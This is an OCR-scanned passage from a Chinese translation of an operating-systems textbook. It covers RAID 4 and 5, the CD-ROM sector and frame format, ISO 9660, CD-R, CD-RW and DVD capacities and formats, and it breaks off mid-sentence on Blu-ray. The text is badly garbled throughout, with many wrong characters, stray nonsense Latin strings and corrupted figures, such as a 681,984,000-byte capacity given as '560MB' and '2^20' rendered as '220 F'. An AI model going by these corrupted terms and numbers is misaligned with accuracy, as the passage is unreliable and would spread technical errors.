字 。 如 图 5-20e 所 示 ，4 级 RAID 与 0 级 RAID 相 类 似 ， 但 是 它 将 条 带 对 条 
带 的 奇偶 条 带 写 到 一 个 额外 的 人 磁 一 上 。 例 如 ， 如 果 每 个 条 带 k 字 节 长 ， 
那么 所 有 的 条 带 进 行 异 或 操作 ， 就 得 到 一 个 k 字 市 长 的 奇偶 条 带 。 如 果 
一 个 驱动 右 崩 涡 了 ， 则 损失 的 字 节 可 以 通过 读 出 整个 驱动 器 组 从 奇偶 
驱动 器 重新 计算 出 来 。 


这 一 设计 对 一 个 驱动 妖 的 损失 拓 供 了 保护 ， 但 是 对 于 微小 的 更 新 
其 性 能 很 差 。 如 采 一 个 情 区 被 修改 了 ， 那 么 就 必 须 读 取 所 有 的 驱动 絮 
以 便 重 新 计算 奇偶 校 答 ， 然 后 还 必须 重 写 奇 侦 校 验 。 作 为 为 一 选择 ， 
它 也 可 以 读 取 旧 的 用 户 数 据 和 旧 的 奇偶 校 验 数据 ， 并 且 用 它们 重新 计 
算 新 的 奇偶 校 验 。 即 使 是 对 于 这 样 的 优化 ， 微 小 的 更 新 也 还 十 需 要 两 


次 读 和 两 次 写 。 
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FAAEA IKA Py So A a Ca, SEMRATDYA BR 
了 这 一 瓶颈 ， 如 图 5-20f 所 示 。 然 而 ， 如 琳 一 个 驱动 右 发 生 朋 演 ， 重 新 
构造 故障 驱动 器 的 内 容 是 一 个 非常 复杂 的 过 程 。 
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图 5-20 0 级 RAID 到 5 级 RAID (备份 驱动 器 及 奇偶 驱动 器 以 阴影 显 


7) 
3.CD-ROM 


最 近 几 年 ， 光 盘 (与 磁 副 相对 应 ) MARIT ° ER EIR STA Re ak 
具有 更 高 的 记录 密度 。 光 副 最 初 是 为 记录 电视 世 目 而 开发 的 ， 但 是 作 
为 计算 机 存储 设备 它们 可 以 被 几 予 更 为 重要 的 用 途 。 由 于 它们 潜在 的 
巨大 容量 ， 光 盘 一 直 侠 大量 研究 工作 的 主题 ， 并 且 经 历 了 令 人 难以 置 
信 的 快速 发 展 。 


第 一 代 光 一 是 傈 兰 的 电子 集团 公司 飞利浦 为 保存 电影 而 发 明 的 。 
它们 的 直径 为 30 cm 并 且 以 LaserVision 的 名 字 上 市 ， 但 是 它们 没有 流行 
起 来 (日 本 除外 ) 。 


1980 年 ， 飞 利 浦 连同 索尼 开发 了 CD (Compact Disc， 上 压缩 光 
盘 ) ， 它 很 快 就 取代 了 每 分 钟 33 1/3 转 的 乙烯 树脂 唱片 来 记录 音乐 ( 艺 
鉴赏 家 除外 ， 他 们 仍旧 喜爱 乙烯 树脂 唱片 ) 。CD 的 准确 技术 细节 以 
正式 国际 标准 (IS 10149) 的 形式 出 版 ， 由 于 其 封面 的 颜色 而 通俗 地 被 
称 为 红皮书 (Red Book) 。 《国际 标准 由 国际 标准 化 组 织 发 布 ， 国 际 
标准 化 组 织 是 诸如 ANSI、DIN 等 国家 标准 团体 的 国际 对 等 机 构 。 每 一 
个 国际 标准 都 有 一 个 IS 号 码 。) 将 光 副 以 及 驱动 右 的 规范 作为 国际 标 
准 出 版 ， 其 目的 在 于 让 来 自 不 同音 乐 出 版 商 的 CD 和 来 自 不 同 电子 设备 


制造 商 的 播放 器 能 够 一 同 工 作 。 所 有 的 CD 都 是 直径 120 mm， 厚 度 1.2 
mm， 中 间 有 一 个 15 mm 的 圆 孔 。 音 频 CD 有 是 第 一 个 成 功 的 大 众 市 场 数 字 
存储 介质 。 瑟 们 被 设想 应 该 能 够 耐用 100 年 。 请 在 2080 年 进行 核对 ， 看 
一 看 第 一 批 CD 还 能 不 能 很 好 地 工作 。 


一 张 CD 的 准备 分 成 几 个 步 又， 包括 使 用 高 功率 的 红外 激光 在 具有 
涂 层 的 玻璃 母 盘 上 烧 出 许多 直径 为 0.8hm 的 小 孔 。 从 这 张 母 盘 可 以 制作 
出 铸模 ， 铸 模 在 激光 了 筷 所 在 的 位 置 具 有 突起 。 将 炊 化 的 聚 碳酸 醋 树 脂 
注入 这 一 钱 柑 ， 束 可 以 形成 具有 与 玻璃 母 胡 相 同 小 和 孔 模 式 的 一 张 CD 。 
然后 将 一 个 非常 荐 的 反射 铝 层 沉积 在 聚 左 酸 酯 上 ， 再 加 上 一 层 保护 性 
的 滚 膜 ， 最 后 加 上 一 个 标签。 到 硬 酸 醋 基 片 中 的 凹陷 处 称 为 上 四 雏 
(pit) , HRZ ARBRE XAT (land) ° 


在 回放 的 时 候 ， 低 功率 的 激光 二 极 管 发 出 波长 为 0.78hm 的 红外 
光 ， 随 着 凹 痕 和 楼 疹 的 通过 照射 在 其 上 。 激 光 在 聚 碳酸 酯 一 面 ， 所 以 
凹 痕 朝 着 激光 的 方向 突出 ， 束 像 是 另 一 侧 平坦 表面 上 的 突起 一 样 。 因 
为 凹 痕 的 高 度 是 激光 波长 的 四 分 之 一 ， 所 以 从 凹 痕 反 射 回来 的 光线 与 
从 周围 表面 反射 回来 的 光线 在 相位 上 相差 半 个 波长 。 结 果 ， 两 部 分 相 
请 干涉 ， 与 从 档 湖 反射 回 的 光线 相 比 只 妈 回 很 少 的 光线 到 播放 如 的 光 
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方案 。 


凹 痕 和 覃 兰 写 在 一 个 连续 螺旋 中 ， 该 螺旋 起 源 于 接近 中 间 圆 孔 的 
地 方 并 且 向 边缘 延伸 出 32 mm 的 距离 。 螺 旋 环 绕 着 光盘 旋转 了 22 188 圈 
(大 约 每 毫米 600 圈 ) ， 如 果 展 开 的 话 ， 它 将 有 5.6 km 长 。 螺 旋 如 图 5- 
21 所 示 。 


He he 


”2K 用 户 数据 块 


图 5-21 压缩 光盘 或 CD-ROM 的 记录 结构 


为 了 以 均匀 的 速度 播放 音乐 ， 必 须 让 凹 痕 和 覃 将 以 恒定 的 线 速度 
通过 。 因 此 ， 当 CD 的 读 出 头 从 CD 的 内 部 向 外 部 移动 时 ，CD 的 旋转 速 


度 必 须 连 续 地 降低 。 在 内 部 ， 旋 转速 度 是 530rpm 以 便 达 到 期 望 的 每 秒 
120 cm 的 流动 速度 ， 而 在 外 部 ， 旋 转速 度 必 须 降 到 200rpm 以 便 在 激光 
头 处 得 到 相同 的 线 速度 。 人 恒定 线 速 度 驱 动 器 与 磁盘 驱 动 器 存在 相当 大 
的 区 别 ， 后 者 以 恒定 角速度 操作 ， 与 磁头 当前 处 于 什么 位 置 无 关 。 此 
外 ，530rpm 与 大 多 数 磁 盘 3600~7200rpm 的 旋转 速度 相 比 存在 相当 大 的 
距离 。 


1984 年 ， 飞 利 浦和 索尼 认识 到 使 用 CD 存放 计算 机 数据 的 潜力 ， 所 
以 他 们 出 版 了 黄皮书 (Yellow Book) ， 定 义 了 现在 称 为 CD-ROM 
(Compact Disc-Read Only Memory， 上 压缩 光盘 -只 读 存 储 器 ) 的 光盘 的 
确切 标准 。 为 了 借助 在 当时 已 经 十 分 牢固 的 音频 CD 市 场 ，CD-ROM 在 
物理 尺寸 上 与 音频 CD 相同 ， 在 机 械 上 和 光学 上 也 与 之 兼容 ， 并 且 使 用 
相同 的 聚 碳酸 酯 注 模 机 器 生产 。 这 一 决策 的 结果 是 ， 不 但 需要 缓慢 的 
可 变速 度 的 电机 ， 而 且 在 适度 的 销量 下 CD-ROM 的 制造 成 本 将 很 好 地 
控制 在 ] 美 元 以 下 。 


黄皮书 所 定义 的 是 计算 机 数据 的 格式 化 。 它 还 改进 了 系统 的 纠 错 
能 力 ， 这 是 一 个 必要 的 措施 ， 因 为 尽管 音乐 爱好 者 并 不 介意 在 这 里 或 
那里 丢失 一 位 ， 但 是 计算 机 爱好 着 往往 对 此 非常 挑 别 。CD-ROM 的 基 
本 格式 是 每 个 字 让 以 14 位 的 符号 进行 编码 。 正 如 我 们 在 前 面 看 到 的 ， 
14 位 足以 对 一 个 8 位 的 字 世 进行 汉 明 编码 ， 并 且 剩 下 2 位 。 实 际 上 ，CD- 
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映射 是 通过 查找 表 由 硬件 实现 的 。 


在 下 一 个 层次 上 ， 一 组 42 个 连续 符号 形成 一 个 588 位 的 帧 
(frame) 。 每 一 帧 拥有 192 个 数据 位 〈24 个 字 节 ) ， 剩 余 的 396 位 用 于 
纠 错 和 控制 。 在 这 396 位 中 ，252 位 是 14 位 符号 中 的 纠 错位 ， 而 144 位 包 
含 在 8 位 符号 的 有 效 载荷 中 中 。 到 目前 为 止 ， 这 一 方案 对 于 首 频 CD 和 
CD-ROM 是 完全 一 致 的 。 


黄皮书 所 增加 的 是 将 98 帧 编组 为 一 个 CD-ROM 刷 区 (CD-ROM 

sector) ， 如 图 5-22 所 示 。 每 个 CD-ROM 户 区 以 一 个 16 字 市 的 前 导 码 开 
始 ， 其 中 前 12 个 字 节 为 00FFFFFFFFFFFFFFFFFFFF00 (十 六 进 制 ) ， 
以 便 让 播放 器 识别 一 个 CD-ROM 扇 区 的 开始 。 接 下 来 的 3 个 字 节 包含 局 
区 号 ， 这 是 必需 的 ， 因 为 在 具有 单个 数据 螺旋 的 CD-ROM 上 寻 道 比 在 
具有 均匀 同心 磁道 的 磁盘 上 和 寻 道 要 困难 得 多 。 为 了 进行 寻 道 ， 驱 动 右 
中 的 软件 要 计算 出 一 个 近似 的 位 置 ， 将 激光 头 移动 到 那里 ， 然 后 开始 
在 四 周 搜 索 一 个 前 导 码 来 看 一 看 猜测 的 如 何 。 前 导 码 的 最 后 一 个 字 节 
是 模式 。 


Don. 口 口 口 每 个 符号 包含 8 个 数据 位 和 6 个 纠 错位 


| 42 个 符号 构成 14X42=588 位 的 一 帧 


mre (24 字 节 ) 和 396 个 纠 错位 
村 人 


98 帧 构成 一 个 扇 区 
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图 5-22 CD-ROM 上 的 逻辑 数据 布局 


黄皮书 定义 了 两 种 模式 。 模 式 1 使 用 图 5-22 的 布局 ， 具 有 16 字 节 的 
前 导 码 、2048 个 数据 字 节 和 一 个 288 字 节 的 纠 错 码 〈 横 交叉 Reed- 
Solomonf4) 。 模 式 2 将 数据 和 ECC 域 合并 成 一 个 2336 字 节 的 数据 域 ， 
用 于 不 需要 纠 错 (或 者 抽 不 出 时 间 执 行 纠 错 ) 的 应 用 ， 例 如 音频 和 视 
频 。 注 意 ， 为 了 提供 优异 的 可 靠 性 ， 在 符号 内 部 、 帧 内 部 和 CD-ROM 
局 区 内 部 使 用 了 三 种 独立 的 纠 错 方案 。 单 个 位 的 错误 在 最 低 的 层次 上 
纠正 ， 短 暂 的 突 发 错误 在 帧 的 层次 上 纠正 ， 任 何 残 留 的 错误 在 遍 区 的 
层次 上 捕获 。 为 这 一 可 靠 性 付出 的 代价 是 花费 98 个 588 位 的 帧 (7203F 
T) RAN 204854 TARR, BER AAB 28% © 
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式 1 下 是 153 600 字 节 / 秒 ， 在 模式 2 下 是 175 200 字 节 / 秒 。 双 速 驱 动 器 快 
两 倍 ， 以 此 类 推 ， 直 到 最 高 的 速度 。 因 此 ， 一 个 40 倍 速 的 驱动 器 能 够 
以 40x153 600 字 下 / 秒 的 速度 传递 数据 ， 假 设 驱 动 器 接口 、 总 线 以 及 操 
作 系 统 都 能 够 处 理 这 样 的 数据 率 。 一 个 标准 的 音频 CD 具有 存放 74 分 钟 


音乐 的 空间 ， 如 果 将 其 用 于 在 模式 1 下 存放 数据 ， 提 供 的 容量 是 681 984 
000 字 节 。 这 一 数字 通常 被 报告 为 560MB， 这 是 因为 1IMB 是 220 F (1 


048 576 字 节 ) ， 而 不 是 1 000 0007 ° 


注意 ， 即 使 一 个 32 倍 速 的 CD-ROM 驱 动 器 (数据 率 为 4 915 200 字 
P/W) 也 无 法 与 速度 为 10MB/s 的 快速 SCSI-2 磁 强 驱 动 器 相配 ， 尽 管 许 
多 CD-ROM 驱 动 器 使 用 了 SCSI 接 口 (也 存在 IDE CD-ROM 驱 动 器 ) 。 
当 你 意识 到 寻 道 时 间 通 常 是 几 百 训 秒 时 ， 隋 会 清楚 CD-ROM 张 动 器 与 
磁盘 驱动 器 在 性 能 上 不 属于 同样 的 范畴 ， 尽 管 它们 有 非常 大 的 容量 。 


1986 年 ， 飞 利 浦 以 绿 皮 书 (Green Book) 再 度 出 击 ， 补 充 了 图 形 以 
及 在 相同 的 而 区 中 保存 交错 的 首 频 、 视 频 和 数据 的 能 力 ， 这 对 于 多 媒 
体 CD-ROM 而 言 是 十 分 必要 的 。 


CD-ROM 的 最 后 一 个 难题 是 文件 系统 。 为 了 使 相同 的 CD-ROM 人 能 
够 在 不 同 的 计算 机 上 使 用 ， 有 关 CD-ROM 文 件 系统 的 协议 是 必要 的 。 
为 了 达成 这 一 协议 ， 许 多 计算 机 公司 的 代表 相聚 在 加 利 福 尼 亚 和 内 华 
达 两 州 边界 处 Tahoe 湖 畔 的 High Sierra 宾 馆 ， 设 计 了 被 他 们 称 为 High 
Sierra 的 文件 系统 ， 这 一 文件 系统 后 来 发 展 成 为 一 个 国际 标准 (IS 
9660) 。 该 文件 系统 有 三 个 层次 。 第 一 层 使 用 最 多 8 个 字符 的 文件 名 ， 
可 选 地 跟随 最 多 3 个 字符 的 扩展 名 (MS-DOS 的 文件 命名 约定 ) 。 文 件 
名 只 能 够 包含 大 写字 母 、 数 字 和 和 下划线。 目录 能 够 咎 套 最 多 8 层 深 度 ， 
晶 是 日 隶 名 不 能 包公 扩展 名 。 第 一 层 要 求 所 有 文件 都 是 连续 的 ， 这 对 


oN 


于 只 能 写 一 次 的 介质 来 说 并 不 是 一 个 问题 。 符 合 IS 9660 标 准 第 一 层 的 
任何 CD-ROM 都 可 以 使 用 MS-DOS、 苹 果 计 算 机 、UNIX 计 算 机 或 者 几 
乎 任何 其 他 计算 机 读 出 。CD-ROM 出 版 商 十 分 看 重 这 一 特性 ， 视 其 为 
重大 的 有 利 因素 。 


IS 9660 第 二 层 人 允许 文件 名 最 多 有 32 个 字符 ， 第 三 层 人 允许 文件 是 不 
连续 的 。Rock Ridge 扩 展 允 许 非常 长 的 文件 名 (针对 UNIX) 、UID、 
GID 和 符号 连接 ， 但 是 不 符合 第 一 层 标准 的 CD-ROM 将 不 能 在 所 有 计算 
机 上 可 读 。 


对 于 出 版 各 种 游戏 、 电 影 、 百 科 全 书 、 地 图 集 以 及 参考 手册 ，CD- 
ROM 已 经 变 得 非常 流行 。 大 多 数 丙 业 软 件 现 在 也 是 通过 CD-ROM 发 行 
的 。 巨 大 的 容量 和 低廉 的 生产 成 本 相 结 合 ， 使 得 CD-ROM 适 合 无 数 的 
AY FA e 


4. 可 刻录 CD 


起 初 ， 制 造 一 片 CD-ROM 母 盘 《或 音频 CD 母 盘 ， 就 此 事 而 言 ) 所 
需要 的 设备 极其 昂贵 。 但 是 按照 计算 机 产业 的 惯例 ， 没 有 什么 东西 能 
够 长 久 地 保持 高 价位 。 到 20 世 纪 90 年 代 中 期 ， 尺 寸 不 比 CD 播 放 器 大 的 
CD 刻录 机 在 大 多 数 计算 机 商店 中 已 经 是 可 以 买 到 的 常见 外 部 设备 。 这 
些 设备 仍然 不 同 于 磁盘 ， 因 为 一 旦 写 入 ，CD-ROM 就 不 能 被 擦 除了 。 
然而 ， 它 们 很 快 就 找到 了 适当 的 位 置 ， 即 作为 大 容量 硬盘 的 备份 介 


质 ， 并 且 还 可 以 让 个 人 或 刚 起 步 的 公司 制造 他 们 目 己 的 小 批量 的 CD- 
ROM， 或 者 制作 母 盘 以 便 递 区 给 高 产量 的 商业 CD 复制 工 六 。 这 些 豫 动 
器 被 称 为 是 CD-R_ (CD-Recordable， 可 刻录 CD) 。 


物理 上 ，CD-R 在 开始 的 时 候 是 像 CD-ROM 一 样 的 120mm 的 聚 碳酸 
酯 空 盘 ， 不 同 的 是 CD-R 包 含 一 个 0.6mm 宽 的 凹 槽 来 引导 激光 进行 写 操 
作 。 岂 横 具有 3mm 的 正弦 振幅 ， 频 率 精确 地 为 22.05 kHz， 以 便 提 供 连 
续 的 反馈 。， 这 样 束 可 以 正确 地 监视 旋转 速度 并 且 在 需要 的 时 候 对 其 进 
行 调整 。CD-R 看 上 去 就 像 是 常规 的 CD-ROM， 只 是 CD-R 顶 面 是 金色 的 
而 不 是 银色 的 。 人 金色 源 于 使 用 真 金 代替 铝 作 为 反射 层 。 银 色 的 CD 在 其 
上 具有 物理 的 凹陷 ， 与 此 不 同 的 是 ， 在 CD-R 上 ， 儿 须 模拟 凹 痕 和 槽 月 
的 不 同 反 射 率 。 这 是 通过 在 聚 碳酸 酯 与 反射 金 层 之 间 添 加 一 层 染 料 而 
实现 的 ， 如 图 5-23 所 示 。 使 用 的 染料 有 两 种 : 绿色 的 花 戎 和 淡 橘 黄色 的 
醚 壮 。 至 于 哪 一 种 染料 更 好 化 学 家 们 可 能 会 无 休止 地 争论 下 去 。 这 些 
染料 与 摄影 技术 中 使 用 的 染料 相 类 似 ， 这 就 解释 了 为 什么 柯达 和 富士 
是 主要 的 空白 CD-R 制 造 商 。 


印刷 标签 


染料 层 中 的 暗 斑 ， 
” 写 入 时 被 激光 烧 出 
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图 5-23 CD-R 盘 和 激光 的 横 和 截面 (未 按 比 例 画 ) 。 银 色 的 CD-ROM 
具有 类 似 的 结构 ， 只 是 不 具有 染料 层 并 且 以 有 凹 痕 的 铝 层 代替 人 金 层 


在 初始 状态 下 ， 染 料 层 是 透明 的 ， 能 够 让 激光 透 过 并 且 从 金 层 反 
射 回来 。 写 入 时 ，CD-R 激 光 提 升 到 高 功率 (8~16mW) 。 当 光束 遇 到 
染料 时 ， 将 其 加 热 ， 从 而 破坏 其 化 学 结合 力 ， 这 一 分 子 结构 的 变化 造 
成 一 个 暗 斑 。 当 读 回 时 (以 0.5mW) ， 光 电 探 测 器 会 识别 出 已 经 被 烧 
过 的 染料 处 的 上 暗 斑 与 完好 的 透明 区 域 之 间 的 区 别 。 这 一 区 别 被 解释 为 
凹 痕 与 槽 将 之 间 的 差别 ， 即 使 在 利 规 的 CD-ROM 阅 读 右 甚至 在 音频 CD 
播放 右上 读 回 时 ， 也 是 如 此 。 


如 果 没 有 一 本 “有 人 色 的 ” 书 ， 就 没有 CD 的 新 类 型 能 够 骄傲 地 昂 起 
头 ， 所 以 CD-R 具 有 橘 皮 书 (Orange Book) ， 出 版 于 1989 年 。 这 份 文档 


定义 了 CD-R 和 一 个 新 格式 CD-ROM XA， 它 人 允许 CD-R 被 逐渐 增长 地 写 
入 ， 今 天 几 个 忆 区 ， 明 天 几 个 鹿 区， 下 个 月 几 个 恒 区 。 一 次 写 入 的 一 
组 连续 的 扇 区 称 为 一 个 CD-ROM 光 轨 (CD-ROM track) ° 


CD-R 的 最 初 应 用 之 一 是 柯达 PhotoCD。 在 这 一 系统 中 ， 消 费 者 将 
一 卷 已 曝光 的 胶片 和 老 的 PhotoCD 带 给 照片 加 工 者 ， 并 且 取 回 同一 个 
PhotoCD， 其 中 新 的 照片 已 经 添加 到 老 的 照片 之 后 。 新 的 一 批 照片 是 通 
过 扫描 底片 创建 的 ， 它 们 作为 单独 的 CD-ROM 光 轨 写 在 PhotoCD 上 ° 
渐 增 长 式 写 入 是 需要 的 ， 因 为 在 这 一 产品 引入 的 时 候 ，CD-R 衬 盘 还 
于 昂贵 ， 以 至 于 负担 不 起 为 每 个 胶卷 提供 一 张 盘 。 


Z 
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然而 ， 逐 渐 增 长 式 写 入 造成 一 个 新 的 问题 。 在 橘 皮 书 之 前 ， 所 有 
的 CD-ROM 在 开始 处 有 一 个 VTOC (Volume Table of Contents， 卷 目 
RK) 。 这 一 方法 对 于 逐渐 增长 式 (也 就 是 多 光 轨 ) 写 入 是 行 不 通 的 。 
橘 皮 书 的 解决 方案 是 给 每 个 CD-ROM 光 轨 提 供 自己 的 VTOC， 在 VTOC 
中 列 出 的 文件 可 以 包含 某 些 或 者 所 有 来 自 先 前 光 轨 中 的 文件 。 当 CD-R 
被 插入 到 驱动 器 之 后 ， 操 作 系 统 从 头 到 尾 搜 索 所 有 的 CD-ROM 光 轨 以 
定位 最 近 的 VIOC， 它 提供 了 光盘 的 当前 状态 。 通 过 在 当前 VIOC 包 含 
来 自 先 前 光 轨 中 的 某 些 而 不 是 全 部 文件 ， 可 能 会 引起 错觉 ， 即 文件 已 
经 被 删除 了 。 光 轨 可 以 被 分 组 成 段 (session) ， 这 样 承 引出 了 多 段 
(multisession) CD-ROM。 标 准 的 音频 CD 播放 器 不 能 处 理 多 段 CD， 因 


为 它们 要 求 在 开始 处 有 一 个 VTOC。 可 是 ， 某 些 计算 机 应 用 程序 可 以 处 
HEN] ° 


CD-R 使 得 个 人 和 公司 轻松 地 复制 CD-ROM (和 音频 CD) 成 为 可 
能 ， 只 是 通常 会 侵犯 出 版 商 的 版 权 。 人 们 设计 了 几 种 方案 使 这 种 盗版 


读 取 CD-ROM 。 方 案 之 一 是 在 CD-ROM 上 将 所 有 文件 的 长 度 记 录 为 几 
吉 字 节 ， 从 而 挫败 任何 使 用 标准 复制 软件 将 文件 复制 到 硬盘 上 的 企 
图 。 实 际 的 文件 长 度 圣 入 在 出 版 商 的 软件 中 ， 或 者 隐藏 (可 能 是 加 密 
的 ) 在 CD-ROM 上 意 想 不 到 的 地 方 。 另 一 种 方案 是 在 挑选 出 来 的 扇 区 
中 故意 使 用 错误 的 ECC， 期 望 CD 复 制 软件 将 会 < 修正 ?这 些 错误 ， 而 应 
用 程序 软件 则 核对 ECC 本 身 ， 如 果 是 正确 的 就 拒绝 工作 。 使 用 光 轨 间 
非 标准 的 间隙 和 其 他 物理 “ 限 辛 * 也 是 可 能 的 。 


5.8] SCD 


尽管 人 们 习惯 于 使 用 其 他 一 次 性 写 的 介质 ， 例 如 纸张 和 摄影 胶 
片 ， 但 是 却 存在 着 对 可 重 写 CD-ROM 的 需求 。 目 前 可 用 的 一 个 技术 是 
CD-RW (CD-ReWritable， 可 重 写 CD) ， 它 使 用 与 CD-ROM 相 同 尺寸 
的 介质 。 然 而 ，CD-RW 使 用 银 、 钢 、 饥 和 税 合 金 作为 记录 层 ， 以 取代 
花 葛 和 酸 善 染料 。 这 一 合金 具有 两 个 稳定 的 状态 : 结晶 态 和 非 结晶 


仿 ， 两 种 状态 具有 不 同 的 反射 率 。 


CD-RW4k Das EA RA = PPA RABE ° EER BR, Bt 
将 合金 融化 ， 将 其 从 高 反射 率 的 结晶 态 转化 为 低 反 射 率 的 非 结晶 态 ， 
代表 一 个 凹 关 。 在 中 功率 下 ， 激 光 将 合金 融化 并 重 构 其 自然 结晶 状态 
以 便 再 次 成 为 一 个 槽 月 。 在 低 功率 下 ， 材 料 的 状态 被 感知 (用 于 读 
取 ) ， 但 是 不 发 生 状态 的 转化 。 


CD-RW 没 有 取代 CD-R 的 原因 是 CD-RW 空 白 盘 比 CD-R 空 白 盘 要 昂 
贯 得 多 。 此 外 ， 对 于 涉及 对 硬盘 进行 备份 的 应 用 程序 来 说 ， 实 际 情 况 
就 是 一 次 性 写 入 ，CD-R 不 会 被 意外 地 擦 除 是 一 大 好 事 。 


6.DVD 


基本 CD/CD-ROM 格 式 目 1980 年 以 来 经 受 了 考验 。 从 那 时 起 ， 技 术 
在 不 断 改 进 ， 所 以 更 高 容量 的 光盘 现在 在 经 济 上 是 可 行 的 ， 并 且 存 在 
着 对 它们 的 巨大 需求 。 好 莱 坞 热切 地 希望 用 数字 光盘 来 取代 模拟 录像 
磁带， 因为 光盘 具有 更 高 的 容量 ， 更 低廉 的 制造 成 本 ， 更 长 的 使 用 时 
间 ， 占 用 音像 商店 更 少 的 货架 空间 ， 并 且 不 必 倒 带 。 消 费 性 电子 公司 
正 期 待 着 一 种 新 型 的 一 鸣 惊 人 的 产品 ， 而 许多 计算 机 公司 则 希望 为 他 
们 的 软件 增添 多 媒体 特性 。 


这 三 个 极其 富有 并 且 势 力 强大 的 产业 在 技术 与 需求 方面 的 结合 引 
出 了 DVD， 最 初 DVD 是 Digital Video Disk (数字 视盘 ) 的 首 字母 缩写 ， 
但 是 现在 官方 的 名 称 是 Digital Versatile Disk (数字 通用 光盘 ) 。DVD 采 


用 与 CD 同样 的 总 体 设 计 ， 使 用 120 mm 的 注 模 育 碳酸 酯 盘 片 ， 包 含 凹 痕 
和 槽 湖 ， 它 们 由 激光 二 极 管 照明 并 且 由 光电 探测 器 读 取 。 新 特性 包括 
te AAT: 


了 更 小 的 止 痕 (0.4pm, CDÆ0.8um) ° 
2) 更 密 的 螺旋 〈 轨 迹 间 距 0.74hm，CD 是 1.6hm) ° 


3) 红 色 激 光 (波长 0.65hm，CD 是 0.78hm) 。 


综合 起 来 ， 这 些 改进 将 容量 提高 了 7 倍 ， 达 到 4.7GB“。 一 个 1 倍速 的 
DVD 张 动 器 以 1.4 MB/s 的 速率 运转 (CD 是 150 KB/s) 。 但 是 ， 切 换 到 
红色 激光 意味 着 DVD 播放 器 需要 第 二 个 激光 器 或 者 价格 高 昂 的 光学 转 
换 器 才能 够 读 取 现 有 的 CD 和 CD-ROM。 随 着 激光 器 价格 的 下 降 ， 现 在 
大 多 数 驱 动 器 都 有 两 种 激光 器 ， 所 以 它们 能 够 读 取 两 种 类 型 的 介质 。 


是 不 是 4.7GB 就 足够 了 ? 也 许 是 。 采 用 MPEG-2 压 缩 (TEIS 13346 
中 标准 化 ) ， 一 块 4.7GB 的 DVD 盘 能 够 保存 133 分 钟 高 分 辩 率 
(720x480) 的 全 屏幕 、 全 运动 视频 ， 以 及 最 多 8 种 语言 的 音 轨 和 最 多 
32 种 语言 的 字幕 。 好 莱 坞 曾经 制作 的 全 部 电影 中 大 约 92% 在 133 分 钟 以 
下 。 然 而 ， 某 些 应 用 (例如 多 媒体 游戏 或 者 参考 手册 ) 可 能 需要 更 多 
的 空间 ， 并 且 好 莱 坞 希望 将 多 部 电影 放 在 同一 张 熏 上 ， 为 此 定义 了 四 
种 格式 : 


1) 单 面 单 层 (4.7GB) ° 
2) 单 面 双 层 (8.5GB) ° 
3) 双 面 单 层 (9.4GB) 。 
4) 双 面 双 层 (17GB) ° 


为 什么 要 如 此 多 种 格式 ? 一 句 话 : 政治 利益 。 飞 利 浦和 索尼 对 于 
高 容量 的 版 本 希望 采用 单 面 双 层 盘 ， 而 东芝 和 时 代 华 纳 则 希望 采用 双 
面 单 层 到 。 飞 利 浦 和 索尼 认为 人 们 不 会 愿意 将 强 族 翻 面 ， 而 东芝 和 时 
代 华 纳 则 不 相信 将 两 层 放 在 一 面 能 够 工作 。 受 协 是 支持 全 部 组 合 ， 但 
是 市 场 将 决定 哪些 格式 会 生存 下 来 。 


双 层 技术 在 底部 具有 一 个 反射 层 ， 在 上 面 加 上 一 个 半 反 射 层 。 激 
光 从 一 层 还 是 从 羽 一 层 反 射 回 来 取决 于 激光 在 何 处 汇聚 。 下 面 一 层 需 
要 稍微 大 一 些 的 凹 凑 和 槽 和 有， 以 便 可 徘 地 恋 出 ， 所 以 其 容量 比 上 面 一 
层 稍微 小 一 些 。 


双 面 盘 是 通过 采用 两 片 0.6 mm 的 单 面 一 并 且 将 它们 背 对 背地 烙 合 
在 一 起 做 成 的 。 为 了 使 所 有 版 本 的 厚度 相同 ， 单 面 盘 包含 一 个 0.6 mm 
的 盘 片 ， 烙 合 在 一 片 空白 的 基底 上 (或 者 也 许 在 将 来 是 粘 合 在 一 个 包 
舍 133 分 钟 广告 的 盘 上 ， 期 望 人 们 会 好 奇 其 中 包含 什么 ) 。 双 面 双 层 盘 
的 结构 如 图 5-24 所 示 。 


聚 碳酸 酯 基底 1 eT 
i 路 酸 酯 i= JER 半 反 射 层 
0.6 mm 单 面 盘 


Se e 


ee Ee ee ee ee n 
SS 人 SS 
a LE 


SEMEL Sic oe OS are el 


“ 半 反 射 层 


聚 碳酸 酯 基底 2 


Al 5-24 双 面 双 层 DVD 一 


DVD 是 由 10 家 消费 性 电子 公司 的 联盟 在 主要 的 好 莱 坞 制 片 厂 的 紧 
密 协作 下 设计 的 ， 其 中 7 家 是 日 本 公司 ， 而 其 中 一 些 好 莱 坞 制 片 三 也 是 
由 联盟 中 的 日 本 电子 公司 所 拥有 。 计 算 机 与 电信 产业 未 被 邀请 参加 这 
一 野餐 会 ， 导 致 的 结果 是 注意 力 集中 在 将 DVD 用 于 电影 租赁 与 营业 性 
放映 上 。 例 如 ， 标 准 特性 包括 实时 跳 过 色情 场景 (使 父母 得 以 将 一 部 
等 级 为 NC17 叫 的 影片 转变 成 对 儿童 安全 的 影片 ) ， 包 含 六 声 道 声音 ， 
并 且 支 持 摇 摄 及 扫描 。 最 后 一 个 特性 是 允许 动态 地 决定 如 何 将 电影 

(其 宽 高 比 为 3:2) 的 左 和 右边 缘 修剪 掉 以 便 适 合 当前 的 电视 机 (其 宽 
高 比 为 4:3) 。 


另 一 个 计算 机 业 大 概 不 会 考虑 的 项 目 是 在 供应 给 美国 的 光 强 与 供 
应 给 欧洲 的 光 强 以 及 适用 于 其 他 大 陆 的 其 他 标准 之 间 故 意 不 兼容 。 因 
为 新 影片 总 是 首先 在 美国 发 行 ， 然 后 当 视 频 产 品 在 美国 上 市 的 时 候 再 
输出 到 欧洲 ， 所 以 好 莱 塌 需要 这 一 “特性 *”。 这 一 主意 可 以 确保 欧洲 的 
首 像 商店 不 能 过 早 地 在 美国 买 到 视频 产品 ， 因 而 减少 新 电影 在 欧洲 的 


票房 收入 。 如 果 计算 机 产业 是 由 好 莱 坞 来 运作 的 ， 那 么 就 会 在 美国 只 
能 使 用 3.5 英 寸 的 软盘 而 在 欧洲 只 能 使 用 9 厘米 的 软盘 。 


发 明 单 面 / 双 面 和 单 层 / 双 层 DVD 的 那些 人 再 一 次 陷入 混战 。 由 于 产 
业界 参与 者 政治 上 的 争论 ， 下 一 代 DVD 仍 然 缺乏 单一 的 标准 。 一 种 新 
的 设备 是 Blu-ray (蓝光 光盘 ) ， 它 使 用 0.405(m GRE) 激光 将 25 GB 
